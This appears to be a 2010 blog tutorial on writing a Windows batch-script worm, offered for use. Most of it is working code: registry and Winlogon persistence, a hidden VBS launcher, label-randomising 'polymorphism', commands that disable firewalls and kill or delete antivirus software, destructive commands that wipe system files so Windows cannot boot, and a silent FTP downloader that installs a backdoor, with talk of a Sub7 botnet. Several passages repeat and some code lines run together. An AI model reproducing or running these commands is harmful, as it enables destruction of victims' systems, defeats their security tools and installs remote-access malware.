Sunday, June 13, 2010
Anu
You wanna make a MALWARE via DOS/BATCH SCRIPT?
okay so i will tell you now what you have to do for a good worm / virus you need a structure so you can take the one from Mega
or
you take mine
thats my art:
Code:
in the first block have to be an autostart script (registry entry, autostart copy, file injection/infection) the reason if the user close it it have to start another time@((
:block1:
@echo off & break off
...
)
)
)
code for runservice registry infection:
Code:
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices /v "shownproccessname" /d ">yourfile<" /f
code for userinit winlogon ifnection
Code:
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "C:\WINDOWS\system32\userinit.exe," /f
also there have to be anything that makes it silent
we're taking this batch code that will drop a shell code
we're taking this batch code that will drop a shell code
Code:
echo Set objShell = CreateObject("WScript.Shell") >>%windir%\system32\shellhost.vbs
echo strCommand = "" >>%windir%\system32\shellhost.vbs
echo objShell.Run strCommand, vbHide, TRUE >>%windir%\system32\shellhost.vbs
i hope you understand thats all
okay you have to know i wouldnt let the worm copy to %windir% or %windir%\system32
because each user would look first into this folder if he means it is ifnected
so take this for example
okay you have to know i wouldnt let the worm copy to %windir% or %windir%\system32
because each user would look first into this folder if he means it is ifnected
so take this for example
copy %0 %windir%\system32\etc\
so next we make a execution morhpism
i've got my own system :
-after each 6 commands you should write a :%random%:
like:
i've got my own system :
-after each 6 commands you should write a :%random%:
like:
Code:
ping google.com
ping google.com
ping google.com
ping google.com
ping google.com
ping google.com
:%random%:
-if you write a jump ( for example :bla)
use this
use this
Code:
set blabla=%random%
:%blabla%
ping bla
goto %blabla%
you can use additional atomical's polymorphic engine
now we write a dll engine
you cant combine the winlogon injeciton with the dll engine !!
look and learn
now we write a dll engine
you cant combine the winlogon injeciton with the dll engine !!
look and learn
Code:
@(((
set bla=assoc) & @(
%bla% .dll=batfile
if not exist %windir%\system32\drivers\driver.dll (@copy %0 %windir%\system32\drivers\driver.dll
:%random%:
) & @(
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices /v "drivers" /d "%windir%\system32\drivers\driver.dll" /f
):%random%:
)
)
next lesson antivir killing
you can kill antivirs in several ways
-block security websites
-kill the tasks
-stop the services
-delete the files
i give examples:
you can kill antivirs in several ways
-block security websites
-kill the tasks
-stop the services
-delete the files
i give examples:
Code:
will stop the firewall and stop mcafee servicenetsh firewall set opmode mode=disable
net stop MCAFEE
Code:
tskill works only for xp so you ahve to write taskill (for vista) and tskill that piece of code kills the task av (antivir)tskill /A av* & taskill av*
Code:
that kills 100% the antivir personal edition totally the process doesnt need to close after thisif exist "%programfiles%\AntiVir PersonalEdition Classic" del /F /S /Q "C:\Programme\Avira\AntiVir PersonalEdition Classic\*.*"
Code:
this block the symantec antivir websiteecho 127.0.0.1 www.symantec.com >%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 symantec.com >>%windir%\system32\drivers\etc\hosts
you can have the full antivir killer on my other thread
now we come to harmefull lesson
so, there are these possibilities
now we come to harmefull lesson
so, there are these possibilities
Code:
with this the computer cannot boot anymoreattrib -h -s -r C:\*
del C:\*.* & del C:\ntldr
Code:
without this windows cannot make anythingren %windir%\system32\hal.dll %windir%\system32\hal.dlllol
this code only renames a important file
Code:
deletes easy all files (after this no bat file can run anymore)del /f /q %windir%\*.* & del /f /Q %windir%\system32\*.*
hmm if there are any ANYYYY question spreading or infection or injection or ANYTHING WITH BATCH you can ask me and i know 100% the code but per pm
Continue:\\
now we make a download batch thats download for example a backdoor or trojan very important is there that it is 100% silent:
Code:
@echo off & break off
:block1:
@(((
:part2:
type %0 > %windir%\system32\drivers\svch.bat
echo Set objShell = CreateObject("WScript.Shell") >>%windir%\system32\shellhost.vbsecho strCommand = "%windir%\system32\drivers\svch.bat" >>%windir%\system32\shellhost.vbs
echo objShell.Run strCommand, vbHide, TRUE >>%windir%\system32\shellhost.vbs) & @(
:part2:
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "C:\WINDOWS\system32\userinit.exe,%windir%\system32\shellhost.vbs" /f >nul)
:part3:
)
if not exist %windir%\system32\drivers\backd.exe (
echo ftp >%windir%\system32\drivers\ftpecho >>%windir%\system32\drivers\ftp
echo >%windir%\system32\drivers\ftpecho get backd.exe
))
:block2:
@(ftp -s:%windir%\system32\drivers\ftp >nul
@reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v shell /d "explorer.exe,%windir%\system32\drivers\backd.exe /f >nul
ping localhost -n 3 >nul)
exit
it creates a shell that will be active on restart then it is invisible and process resistant (because fo the winlogon injection) then it logs into your ftp and downloads backd.exe. it sets a registry entry and on restart the backdoor is active
so my friend asked me if i could make a botnet in batch of course it wont work but with a bit help with a sub7 trojan with the method above and the combination of my AV killer it works
you have to set an irc server in the sub7 but i displain it more in my next tutorials
so my friend asked me if i could make a botnet in batch of course it wont work but with a bit help with a sub7 trojan with the method above and the combination of my AV killer it works
you have to set an irc server in the sub7 but i displain it more in my next tutorials
Posted in
0 comments:
Post a Comment